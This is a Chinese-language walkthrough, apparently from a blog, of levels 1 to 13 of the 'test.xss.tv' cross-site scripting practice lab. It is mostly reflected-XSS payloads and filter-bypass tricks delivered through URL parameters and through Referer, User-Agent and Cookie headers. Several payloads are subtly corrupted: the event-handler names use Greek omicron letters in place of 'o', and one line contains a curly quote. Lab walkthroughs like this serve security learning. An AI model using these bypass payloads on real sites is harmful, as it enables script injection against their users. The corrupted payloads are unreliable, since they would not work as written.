http://test.xss.tv
1、http://47.94.13.75/test/level1.php?name=test
直接插入即可,如:
http://47.94.13.75/test/level1.php?name=<script>alert(1)</script>
2、http://47.94.13.75/test/level2.php?keyword=test
文本框中输入,闭合一下即可,如:
http://47.94.13.75/test/level2.php?keyword="><script>alert(1)</script>
3、http://47.94.13.75/test/level3.php?writing=wait
尖括号被编码,直接使用事件即可,如:
http://47.94.13.75/test/level3.php?keyword=' οnmοuseοver=alert(1) '&submit=搜索
4、http://47.94.13.75/test/level4.php?keyword=try harder!
与第三关类似,使用事件来闭合,弹窗,如:
http://47.94.13.75/test/level4.php?keyword=" οnmοuseοver=alert(1) "&submit=搜索
5、http://47.94.13.75/test/level5.php?keyword=find a way out!
事件被插入特殊符号,改用其它标签,如:
http://47.94.13.75/test/level5.php?keyword="><a href=javascript:alert(1)>click</a>&submit=搜索
点击click链接即可弹窗
6、http://47.94.13.75/test/level6.php?keyword=break it out!
与第五关类似,这里可以直接用大写绕过,如:
http://47.94.13.75/test/level6.php?keyword=" Onmouseover=alert(1) "&submit=搜索
7、http://47.94.13.75/test/level7.php?keyword=move up!
on直接被过滤,用嵌套绕过,如:
http://47.94.13.75/test/level7.php?keyword=" oonnmouseover=alert(1) "&submit=搜索
8、http://47.94.13.75/test/level8.php?keyword=nice try!
链接型,js协议加编码绕过绕过,如:
http://47.94.13.75/test/level8.php?keyword=javascript:alert(1)&submit=添加友情链接
9、http://47.94.13.75/test/level9.php?keyword=not bad!
构造合法链接,结合js协议与编码绕过,如:
http://47.94.13.75/test/level9.php?keyword=javascript:alert("http://")&submit=添加友情链接
10、http://47.94.13.75/test/level10.php?keyword=well done!
根据源码构造url参数,如:
http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" οnmοuseοver=alert(1) type="button" "
http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" accesskey="X" οnclick=“alert(1) ///通过shift+alt+X快捷键触发(火狐可以)
11、http://47.94.13.75/test/level11.php?keyword=good job!
抓取post数据包,构造referer值,如:
GET /test/level11.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Referer:" οnmοuseοver=alert(1) type="button" "
12、http://47.94.13.75/test/level12.php?keyword=good job!
构造user-agent值即可,如:
GET /test/level12.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0" οnmοuseοver=alert(1) type="button" "
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
13、http://47.94.13.75/test/level13.php?keyword=good job!
构造cookie,如:
GET /test/level13.php?keyword=good%20job! HTTP/1.1
Host: 47.94.13.75
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: user=call+me+maybe%3F" οnmοuseοver=alert(1) type="button" "
Connection: keep-alive
Upgrade-Insecure-Requests: 1
扫一扫
2117
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
